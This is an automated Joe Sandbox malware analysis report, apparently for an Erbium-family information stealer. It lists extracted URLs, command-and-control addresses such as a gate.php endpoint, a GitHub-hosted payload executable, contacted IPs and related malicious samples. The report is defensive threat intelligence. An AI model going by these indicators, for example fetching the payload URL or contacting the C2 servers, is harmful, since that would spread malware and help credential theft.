                https://github.com/lakrica0/TeIegram/raw/main/winscr.exefalse
                  high
                  http://194.190.152.194/gate.phptrue
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://support.google.com/chrome?p=update_errorKit/537.36EgNIXduB6T.exe, 00000000.00000002.506039869.000000000150C000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369149690.0000000001509000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369400707.000000000150B000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://duckduckgo.com/chrome_newtabEgNIXduB6T.exe, 00000000.00000003.241157208.0000000001575000.00000004.00000020.00020000.00000000.sdmp, TempWebDatabase.0.drfalse
                      high
                      https://raw.githubusercontent.com/lakrica0/TeIegram/main/winscr.exepwJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276315735.0000000001930000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://duckduckgo.com/ac/?q=TempWebDatabase.0.drfalse
                        high
                        https://fs.microsoft.cwJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276421228.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000002.507540025.00000000018D3000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://support.g#EgNIXduB6T.exe, 00000000.00000003.246622447.0000000007D74000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.googleEgNIXduB6T.exe, 00000000.00000003.241378953.0000000001571000.00000004.00000020.00020000.00000000.sdmp, TempHistory.0.drfalse
                          high
                          https://search.yahoo.com?fr=crmas_sfpfEgNIXduB6T.exe, 00000000.00000003.241157208.0000000001575000.00000004.00000020.00020000.00000000.sdmp, TempWebDatabase.0.drfalse
                            high
                            https://github.com/lakrica0/TeIegram/raw/main/winscr.exezwJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276486720.00000000018D3000.00000004.00000020.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000002.507540025.00000000018D3000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://support.google.com/chrome?p=update_errorFixTempHistory.0.drfalse
                                high
                                https://raw.githubusercontent.com/lakrica0/TeIegram/main/winscr.exeSSC:wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276486720.00000000018D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://support.google.com/chrome/answer/6315198?product=TempHistory.0.drfalse
                                  high
                                  https://curl.se/docs/hsts.htmlEgNIXduB6T.exe, EgNIXduB6T.exe, 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000002.506717287.0000000001E00000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://github.com/qewJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276421228.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000002.507540025.00000000018D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://194.190.152.194/gate.phpdEgNIXduB6T.exe, 00000000.00000002.506039869.000000000150C000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369149690.0000000001509000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369400707.000000000150B000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_erroTempHistory.0.drfalse
                                      high
                                      https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowsTempHistory.0.drfalse
                                        high
                                        https://github.com/wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276421228.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276315735.0000000001930000.00000004.00000020.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000002.507908227.0000000001933000.00000004.00000020.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000002.507540025.00000000018D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://www.google.com/intl/en_uk/chrome/TempHistory.0.drfalse
                                            high
                                            https://t.me/erbium_newsEgNIXduB6T.exe, 00000000.00000003.251492860.000000000157F000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000002.506039869.000000000150C000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369149690.0000000001509000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251706793.0000000001589000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251507801.000000000158B000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251543471.000000000157F000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.254549528.00000000015B7000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251613510.0000000001542000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251553922.000000000158B000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369400707.000000000150B000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251716077.000000000158B000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251470245.00000000015B7000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.254609102.00000000015B7000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000002.506575134.00000000015B7000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251843131.0000000001590000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251664624.000000000157F000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000002.506476947.00000000015A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://sourceforge.net/projects/filezilla/hjrypmyqervekvpteu.exe, 00000002.00000002.506259275.000000000152E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://support.google.com/chrome?p=update_errorEgNIXduB6T.exe, 00000000.00000002.506039869.000000000150C000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369149690.0000000001509000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000002.506434482.000000000158C000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.246704571.00000000015B7000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.249137494.000000000158D000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251507801.000000000158B000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.246731972.000000000158D000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251553922.000000000158B000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369400707.000000000150B000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251716077.000000000158B000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.241382685.0000000001579000.00000004.00000020.00020000.00000000.sdmp, TempHistory.0.drfalse
                                                  high
                                                  https://www.google.com/intl/en_uk/chrome/GoogleEgNIXduB6T.exe, 00000000.00000003.241360685.00000000015A2000.00000004.00000020.00020000.00000000.sdmp, TempHistory.0.drfalse
                                                    high
                                                    https://t.me/erbium_supportEgNIXduB6T.exe, 00000000.00000003.251492860.000000000157F000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000002.506039869.000000000150C000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369149690.0000000001509000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251706793.0000000001589000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251507801.000000000158B000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251543471.000000000157F000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.254549528.00000000015B7000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251613510.0000000001542000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251553922.000000000158B000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369400707.000000000150B000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251716077.000000000158B000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251470245.00000000015B7000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.254609102.00000000015B7000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000002.506575134.00000000015B7000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251843131.0000000001590000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251664624.000000000157F000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000002.506476947.00000000015A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://raw.githubusercontent.com/lakrica0/TeIegram/main/winscr.exeLMEMwJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276315735.0000000001930000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://support.google.com/chrome/answer/6315198?ptefdQEgNIXduB6T.exe, 00000000.00000003.246721182.000000000157F000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.246772033.000000000157F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoEgNIXduB6T.exe, 00000000.00000003.241157208.0000000001575000.00000004.00000020.00020000.00000000.sdmp, TempWebDatabase.0.drfalse
                                                          high
                                                          https://www.google.com/search?q=chrome&oq=chrome&aqs=chrome..69i57j0j5l3j69i60l3.2663j0j4&sourceid=cTempHistory.0.drfalse
                                                            high
                                                            https://curl.se/docs/http-cookies.htmlEgNIXduB6T.exe, EgNIXduB6T.exe, 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000002.506717287.0000000001E00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BBD4EA3DAEgNIXduB6T.exe, 00000000.00000003.241378953.0000000001571000.00000004.00000020.00020000.00000000.sdmp, TempHistory.0.drfalse
                                                              high
                                                              https://github.com/-wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276315735.0000000001930000.00000004.00000020.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000002.507908227.0000000001933000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://github.com/lakrica0/TeIegram/raw/main/winscr.exeC:wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000000.263803529.00000000020F0000.00000040.00000001.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000000.260483650.00000000020F0000.00000040.00000001.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000000.259475130.00000000020F0000.00000040.00000001.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000000.261729658.00000000020F0000.00000040.00000001.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000000.257036911.00000000020F0000.00000040.00000001.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://raw.githubusercontent.com/lakrica0/TeIegram/main/winscr.exe1wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276315735.0000000001930000.00000004.00000020.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000002.507908227.0000000001933000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=TempWebDatabase.0.drfalse
                                                                    high
                                                                    https://github.com/lakrica0/TeIegram/raw/main/winscr.exegswJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276315735.0000000001930000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchEgNIXduB6T.exe, 00000000.00000003.241157208.0000000001575000.00000004.00000020.00020000.00000000.sdmp, TempWebDatabase.0.drfalse
                                                                        high
                                                                        https://curl.se/docs/alt-svc.htmlEgNIXduB6T.exe, EgNIXduB6T.exe, 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000002.506717287.0000000001E00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://77.73.133.53/cloud/getHost.php?method=getstub&bid=1923830098%20%20%20%20%20%20%20%20%20%20%20EgNIXduB6T.exe, 00000000.00000002.505628300.00000000014CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=EgNIXduB6T.exe, 00000000.00000003.241157208.0000000001575000.00000004.00000020.00020000.00000000.sdmp, TempWebDatabase.0.drfalse
                                                                          high
                                                                          https://raw.githubusercontent.com/wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000002.507908227.0000000001933000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://support.google.com/installer/?product=TempHistory.0.drfalse
                                                                            high
                                                                            https://ac.ecosia.org/autocomplete?q=TempWebDatabase.0.drfalse
                                                                              high
                                                                              https://search.yahoo.com?fr=crmas_sfpEgNIXduB6T.exe, 00000000.00000003.241157208.0000000001575000.00000004.00000020.00020000.00000000.sdmp, TempWebDatabase.0.drfalse
                                                                                high
                                                                                http://194.190.152.194/api.php?method=getstub&bid=default%20%20%20%20%20%20%20%20%20&tag=Telegram%20EgNIXduB6T.exe, 00000000.00000003.240446775.0000000001509000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.winimage.com/zLibDllEgNIXduB6T.exe, EgNIXduB6T.exe, 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000002.506717287.0000000001E00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://raw.githubusercontent.com/VwJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276315735.0000000001930000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://raw.githubusercontent.com/lakrica0/TeIegram/main/winscr.exeywJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276315735.0000000001930000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://t.me/erbium_support)UpdatesEgNIXduB6T.exe, 00000000.00000003.251415719.0000000007DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.winimage.com/zLibDll1.2.11.1-motley.z%02d...././///.//../6666666666666666jjjjjjjjjjjjjjjjEgNIXduB6T.exe, 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000002.506717287.0000000001E00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=TempWebDatabase.0.drfalse
                                                                                        high
                                                                                        http://194.190.152.194/gate.phpphpEgNIXduB6T.exe, 00000000.00000002.506039869.000000000150C000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369149690.0000000001509000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369400707.000000000150B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://raw.githubusercontent.com/dwJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276315735.0000000001930000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://github.com/lakrica0/TeIegram/raw/main/winscr.exefox/97.0&EgNIXduB6T.exe, 00000000.00000002.506039869.000000000150C000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369149690.0000000001509000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369400707.000000000150B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://support.google.com/chrome/answer/6315198?ptEgNIXduB6T.exe, 00000000.00000003.246721182.000000000157F000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.246772033.000000000157F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs
                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            185.199.108.133
                                                                                            raw.githubusercontent.comNetherlands
                                                                                            54113FASTLYUSfalse
                                                                                            194.190.152.194
                                                                                            unknownRussian Federation
                                                                                            41615RSHB-ASRUtrue
                                                                                            140.82.121.3
                                                                                            github.comUnited States
                                                                                            36459GITHUBUSfalse
                                                                                            77.73.133.53
                                                                                            unknownKazakhstan
                                                                                            43260AS43260TRtrue
                                                                                            185.106.92.60
                                                                                            unknownRussian Federation
                                                                                            50113SUPERSERVERSDATACENTERRUtrue
                                                                                            Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                            Analysis ID:719200
                                                                                            Start date and time:2022-10-10 06:01:06 +02:00
                                                                                            Joe Sandbox Product:CloudBasic
                                                                                            Overall analysis duration:0h 7m 53s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Sample file name:EgNIXduB6T.exe
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                            Number of analysed new started processes analysed:13
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:1
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • HDC enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.spyw.evad.winEXE@3/7@2/5
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            HDC Information:
                                                                                            • Successful, ratio: 63.6% (good quality ratio 60.4%)
                                                                                            • Quality average: 80.7%
                                                                                            • Quality standard deviation: 26.3%
                                                                                            HCA Information:Failed
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .exe
                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                            • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ocsp.digicert.com, ctldl.windowsupdate.com
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            TimeTypeDescription
                                                                                            06:01:57API Interceptor1x Sleep call for process: EgNIXduB6T.exe modified
                                                                                            06:02:15API Interceptor200x Sleep call for process: hjrypmyqervekvpteu.exe modified
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                            185.199.108.133browser_assistant_1.exeGet hashmaliciousBrowse
                                                                                              update_2.exeGet hashmaliciousBrowse
                                                                                                DedexQ.exeGet hashmaliciousBrowse
                                                                                                  Miner.exeGet hashmaliciousBrowse
                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                          f397ed34de579b8fe727507d13811cda060819c50f094.exeGet hashmaliciousBrowse
                                                                                                            iD1sddR3nM.exeGet hashmaliciousBrowse
                                                                                                              6taZZPLqqU.exeGet hashmaliciousBrowse
                                                                                                                5e912d0af4bb2029e01d676a0289b41f5f592558772f3.exeGet hashmaliciousBrowse
                                                                                                                  https://monograph.notesnook.com/633e13e64a4a4aecd6848486Get hashmaliciousBrowse
                                                                                                                    xSeFxBPmvQ.exeGet hashmaliciousBrowse
                                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                                        oFsqrDYtmS.exeGet hashmaliciousBrowse
                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                              BK6FQwW7vK.exeGet hashmaliciousBrowse
                                                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                    140.82.121.30XzeMRyE1e.exeGet hashmaliciousBrowse
                                                                                                                                    • github.com/neiqops/ajajaj/raw/main/file_22613.exe
                                                                                                                                    MzRn1YNrbz.exeGet hashmaliciousBrowse
                                                                                                                                    • github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe
                                                                                                                                    RfORrHIRNe.docGet hashmaliciousBrowse
                                                                                                                                    • github.com/ssbb36/stv/raw/main/5.mp3
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    github.comzPy5iNStVs.exeGet hashmaliciousBrowse
                                                                                                                                    • 140.82.121.4
                                                                                                                                    fXsvbNiWbA.exeGet hashmaliciousBrowse
                                                                                                                                    • 140.82.121.3
                                                                                                                                    WorU0yNg1Q.exeGet hashmaliciousBrowse
                                                                                                                                    • 140.82.121.3
                                                                                                                                    TPVmfH41Wp.exeGet hashmaliciousBrowse
                                                                                                                                    • 140.82.121.3
                                                                                                                                    P5W2CyiDlC.exeGet hashmaliciousBrowse
                                                                                                                                    • 140.82.121.4
                                                                                                                                    mABBo9ckP3.exeGet hashmaliciousBrowse
                                                                                                                                    • 140.82.121.3
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 140.82.121.4
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 140.82.121.4
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 140.82.121.3
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 140.82.121.3
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 140.82.121.4
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 140.82.121.4
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 140.82.121.4
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 140.82.121.3
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 140.82.121.3
                                                                                                                                    14Igy9dXIU.exeGet hashmaliciousBrowse
                                                                                                                                    • 140.82.121.4
                                                                                                                                    88wfAIx84e.exeGet hashmaliciousBrowse
                                                                                                                                    • 140.82.121.4
                                                                                                                                    K2yC5Pi15r.exeGet hashmaliciousBrowse
                                                                                                                                    • 140.82.121.3
                                                                                                                                    Gkr2Z4sQ3v.exeGet hashmaliciousBrowse
                                                                                                                                    • 140.82.121.4
                                                                                                                                    JYhP4FSfkn.exeGet hashmaliciousBrowse
                                                                                                                                    • 140.82.121.4
                                                                                                                                    raw.githubusercontent.combrowser_assistant_1.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    update_2.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    telem.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.111.133
                                                                                                                                    DedexQ.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    update_2.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.111.133
                                                                                                                                    Miner.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    browser_assistant.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.111.133
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    f397ed34de579b8fe727507d13811cda060819c50f094.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.111.133
                                                                                                                                    7e5006d509630d610db58ca5f415f07c68c947fc3a415.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.110.133
                                                                                                                                    iD1sddR3nM.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.111.133
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.111.133
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.110.133
                                                                                                                                    5e912d0af4bb2029e01d676a0289b41f5f592558772f3.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    1c8edce4a868257106013cc2c20f469efe7687f1d3047.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.111.133
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    FASTLYUShttps://www.canva.com/design/DAFOmmaJTHs/vys9V2rulQ_fYRsNNh933Q/view?utm_content=DAFOmmaJTHs&utm_campaign=designshare&utm_medium=link&utm_source=homepage_design_menuGet hashmaliciousBrowse
                                                                                                                                    • 151.101.1.46
                                                                                                                                    http://www.agodarentacar.comGet hashmaliciousBrowse
                                                                                                                                    • 151.101.114.208
                                                                                                                                    browser_assistant_1.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    update_2.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    telem.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.111.133
                                                                                                                                    DedexQ.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    update_2.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.111.133
                                                                                                                                    Miner.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    browser_assistant.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.111.133
                                                                                                                                    http://assurancewirelessebb.shop/?dD1jJmQ9ODI2NzkmbD0xMjU0MiZjPTcyOTA4Get hashmaliciousBrowse
                                                                                                                                    • 199.232.136.158
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    http://monsoonshop.comGet hashmaliciousBrowse
                                                                                                                                    • 199.232.136.84
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    https://dola.com/Get hashmaliciousBrowse
                                                                                                                                    • 199.232.136.157
                                                                                                                                    https://heyzine.com/flip-book/c936dde9b7.htmlGet hashmaliciousBrowse
                                                                                                                                    • 151.101.0.176
                                                                                                                                    Customer Invoice.jarGet hashmaliciousBrowse
                                                                                                                                    • 199.232.192.209
                                                                                                                                    https://mararthonengcorp-my.sharepoint.com:443/:o:/g/personal/acorbisello_marathonengcorp_com/EheRI0dvBU1Bppgmma8AG1UBFv2Pb6WAy90rIjxuz1Fiew?e=5%3aeNgMnx&at=9Get hashmaliciousBrowse
                                                                                                                                    • 151.101.0.119
